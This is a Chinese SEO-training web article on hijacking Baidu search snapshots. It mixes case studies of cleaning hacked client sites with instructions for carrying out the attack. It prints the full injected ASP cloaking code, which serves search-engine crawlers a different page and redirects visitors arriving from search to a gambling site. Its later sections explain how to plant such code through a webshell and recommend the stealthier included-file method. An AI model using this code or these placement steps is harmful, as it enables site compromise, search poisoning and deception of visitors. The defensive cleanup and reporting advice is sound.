您當前的位置:首頁 > 百度seo > 百度seo優化

百度快照劫持

2018-01-03 21:21:42 來源: seofuwu 作者: 滿山紅seo培訓
  
  
摘要: 百度快照劫持可能有些朋友還不清楚“百度快照劫持”到底是什么意思?那么我就先給大家解釋一下:百度快照劫持也就是搜索引擎抓取的是正常網站的快照,但通過搜索關鍵

 百度快照劫持


可能有些朋友還不清楚“百度快照劫持”到底是什么意思?那么我就先給大家解釋一下:百度快照劫持也就是搜索引擎抓取的是正常網站的快照,但通過搜索關鍵詞點擊進入網站之后展現的確實另外一種內容,說白了也就是人所看到的網站和搜索引擎看到的網站是不一樣的。

百度快照劫持

最近,我的一位客戶找到我緊急求救說自己的網站被黑客攻擊了,網站打開之后內容已被篡改顯示的是博彩的信息。通過在地址欄直接輸入域名打開是沒問題的。但當通過百度搜索關鍵詞“紅祥建材”發現果真如他所說的那樣,進入之后全部都是博彩的廣告。

起先,在搜索返回結果中,顯示的還是原本的標題和描述:

百度快照劫持

從搜索結果來看還是比較正常的,但當點進去之后才發現網站域名已經跳轉到掛滿博彩廣告的網站上:

百度快照劫持

這就是最典型的網站百度劫持案例了。其實呢,遇到網站被人百度快照劫持也不要太慌張了,這個問題解決起來真的并沒有那么復雜。下面就來說說我是怎么解決的吧。

網站一旦遇到快照劫持,首先第一反應就是系統檢查網站代碼,一旦發現可疑的代碼就立即診斷檢測當機立斷。我通過查看源代碼發現,網站出現了這樣一大段很不尋常的代碼:

百度快照劫持

經仔細分析確認這段代碼就是被黑客加上去的,于是我迅速將其刪掉,這樣以來網站就恢復了正常,在這里要提醒大家的是我們在清除這些垃圾代碼后,要清除瀏覽器的歷史記錄或者Ctrl+F5強制刷新瀏覽器之后才能看到效果。之所以要作為專門強調提醒是因為我吃過虧,至于具體是什么虧你可以自己去想象:我檢查了一遍又一遍沒有發現問題,到頭來才恍然大悟原來是瀏覽器緩存的緣故。

至于我們如何快速找到黑客植入攻擊代碼的文件,告訴大家一個簡單的方法,就是查看網站文件的修改時間,一些最近最新的修改時間的文件而且你自己又沒有動過的,那么你就在這兒尋找,可以將這個別的幾個文件單獨下載下來然后用編輯器全局搜索,這樣我們就很容易找到具體的被植入代碼的文件了。

百度快照劫持

另外,網站根目錄如果有一些可疑的文件,而且能確定不是你自己主動添加的,那么這些文件你就一定要好好排查一下了。再者咱們的網站后臺登錄密碼以及服務器的密碼最好都設置難度高一點的,免得被人輕易攻破。

目前網站的百度快照劫持雖然解決了,但由于發現時間太晚,百度在我檢查解決問題的同時也更新了快照,當然這也只能算作是百度的快照緩存,于是便出現了下面如圖所示的情況:

百度快照劫持

網站的本身在問題解決之后通過百度搜索關鍵詞點進去是沒有問題的,網站已經恢復了正常,剩下的也就是百度快照恢復過來就行了。這個問題我也已經做了百度快照投訴,相信在不久之后網站就可以全面復原。

所以為了避免這一問題的出現我們最好能對自己的網站關心點,引以為戒。做好網站安全方面的防護,同時也希望廣大站長朋友不要惡意去攻擊他人的網站,因為大家都不容易!

二,百度快照是如何被黑客篡改的

寫本篇文章的目的在于揭露一種黑客作弊的手段,也給那些疏于企業網站安全的站長提一個醒。同時提供一種追找黑客行蹤的簡單方法。

百度快照劫持

前幾日,我的客戶電話說自己的百度排名沒有了,查詢下竟然百度標簽顯示的內容是一家彩票平臺的網站內容。 我知道網站被黑客加入了非法代碼,惡意篡改了百度快照。(截圖如下)

百度快照劫持

查看“百度快照”出現的是一組跳轉網站的廣告內容。我們對客戶設置的網站信息消失了。

百度快照劫持

1、黑客是如何修改百度快照的呢?

我進行了排查,客戶的網站是使用asp源碼開發的。發現有個文件被黑客寫入了一段代碼。

路徑:Inc文件夾—SysProduct.asp文件里面最底下添加了如下代碼:

百度快照劫持

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳轉的網站,引導百度抓取的內容)

else

'

Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目標網站)window.adworkergo='ad_app6'}else{}</script>"

end if

%>

黑客設置的這串代碼導致百度爬蟲抓取網頁的時候,直接抓取越過客戶網站抓取了跳轉網站內容,導致百度快照里面顯示的是別的內容。使得客戶本來排名首頁的網站直接被百度屏蔽了。造成了客戶很大的損失。

2、那么黑客是如何進入后臺的呢?

黑客要進入后臺,必須知道FTP賬戶和密碼,以及IP地址。

造成的原因有如下幾種:

1)一方面是FTP密碼設置的時候比較簡單化,很容易被利用軟件破解掉,

2)另一方面選擇便宜的空間也是一種隱患。因為空間IP以及用戶名是很難被知道的,除非有人提供。

3、網站被黑之后,你如何追查黑客的來源?

方法比較簡單,就是查詢你跳轉的目標網站的域名信息。一般情況下,都是一些小型的站長開發的賺錢網站,通過查詢域名信息你可以獲知該域名的歸屬人是誰,他有可能就是黑你網站的人。

如果是比較大型的網站利用外包的方式進行推廣,那么你也可以得知負責人,給百度或者是網絡警察舉報一下,該網站存在惡意攻擊修改內容的行為,畢竟它也有一定得責任。

通過中國萬網Whois域名查詢:比如我客戶跳轉的彩票網站的域名信息如下:

百度快照劫持

1)第一個是:注冊人

2)第二個是:聯系電話

3)第三個是:聯系郵箱

基本上你聯系注冊人就可以解決問題。如果對你客戶造成的損失太大的話,建議你通過以下方式進行維權:

違法和不良信息舉報中心:http://net.china.cn/

12321網絡不良與垃圾信息舉報受理中心:http://www.12321.cn/

國家互聯網應急中心網絡安全舉報中心:http://www.cert.org.cn/

中國反釣魚網站聯盟認定及處理流程: http://www.cnnic.cn/

公安部信息網絡安全報警網站:http://www.cyberpolice.cn/wfjb/

中國掃黃打非網:http://www.shdf.gov.cn/

北京市公安局網絡違法犯罪舉報網站:http://www.bj.cyberpolice.cn/index.jsp

三,seo黑帽之百度快照劫持技術分享 

昨天晚上看了一個seo黑帽劫持百度快照的視頻教程,決定分享出來,不是倡導大家如何去用黑帽的手法來作弊,只是教給大家如果自己的網站快照被劫持了應該怎么解決,好了廢話不多說了,小貓咪直接上干貨!

seo黑帽劫持百度快照分為三種,分別是靜態頁html,動態asp和php。其實原理都差不多,只要找到他們相應的首頁文件index.html,index.asp,index.php就可以進行投放我們的百度快照劫持代碼了。

seo黑帽百度快照劫持具體操作方法:

1、找到劫持目標網站

2、進入劫持站的webshell,就是可控制該網站的后臺。

3、進入后臺找到首頁文件編輯把我們的劫持代碼放到首頁文件內部的<head>和</head>標簽之間即可。

百度劫持代碼要修改的地方:

asp和php劫持代碼需要修改的地方一個是百度抓取到你網站快照的網址,另一個是要跳轉到你網站的網址,這兩個都是你的網址。靜態html:劫持代碼有一段標題需要你設置被劫持網站的標題,目的是為了給網站所有者看的迷惑對方,只需要把他網站本身的標題,關鍵詞,描述修改為你自己的網站信息,快照就會變成你自己的了。

百度快照劫持的方法就是這么簡單,今天就是簡單的講了下百度快照劫持的操作手法,當你的網站被劫持快照了應該知道怎么去解決了吧,只要找到首頁文件把<head>和</head>之間的劫持代碼刪掉即可,等待百度快照下次更新即可變為你網站本身的快照。

四,劫持百度快照的三種代碼添加方法

快照劫持是通過代碼來判斷和識別蜘蛛訪問的程序,如果是正常訪問,則給出正常內容,而如果判斷到是搜素引擎來訪問,就給出另一個頁面,使其在搜素引擎中的快照進行改變,之后判斷來路跳轉,如果是搜素引擎打開就跳轉到我們指定的網站,如果正常訪問,就不做變化,顯示正常的內容。劫持在這里就不多說了,我們來看下添加劫持代碼的三種方法。

第一種:放在Head下進行劫持快照

直接將代碼放到首頁的Head標簽下即可進行劫持,非常的方便。

第二種:放到已有的Include文件里面進行劫持快照

Include是包括的意思,也就是說Include是首頁文件引用的另一個文件,我們把代碼加到這個Include文件中,同樣能實現劫持效果,而此時劫持代碼并不在首頁,而是放到了Include文件中。

第三種:創建一個新的Include文件進行劫持快照

創建一個文件,然后把劫持代碼放到這個文件中,之后,我們需要引用這個文件,需要在首頁插入一句Include文件引用代碼,即可實現劫持。這個方法和第二個是一樣的,區別在于第二個直接加在已有的文件上,而這個需要創建文件還要添加引用代碼,并第二種做法多了兩個步驟。

在選擇上,這三種方法中,第一種是最直接和方便的,直接加到主頁文件里面就行。第二種和第三種相對隱蔽些,第二種只需在已有的Include文件中加上劫持代碼即可,也非常的方便,并且隱蔽。第三種方法同樣很隱蔽,但多了兩個步驟,一個是需要創建一個Include文件,還有就是要添加一行引用Include文件的代碼。綜合下來,推薦使用第二種方法,第二種方法比第一種隱蔽,比第三種方便。

本文由滿山紅SEO培訓編輯收集于網絡不代表本站觀點,如果您還想了解更多關于網站seo優化與SEO培訓視頻教程的文章,請點擊查看seo培訓seo顧問服務的其它文章,請關注滿山紅seo快速排名優化平臺(www.99014418.com).

上一篇:返回列表
下一篇:【SEO培訓公司】百度的基因是什么?是技術
熱門推薦
SEO顧問
黑帽seo
晉江網站建設
桂林seo:合格的SEOer,應具備哪些能力
SEO培訓學習方式是否正確,決定SEO技術水平高低
樂陵seo:觀百度需求,思SEO優化方向
seo技術培訓教程:Google搜索引擎中的安全漏洞 通過開放重定向竊取其他站點的權重
百度seo排名培訓:企業產品網站三個月關鍵詞排名上百度首頁排名策略
seo實戰培訓王乃用:內容營銷來提升長尾詞SEO優化排名技巧
速貝seo實戰培訓:搜索引擎算法不斷升級 未來seo該怎么做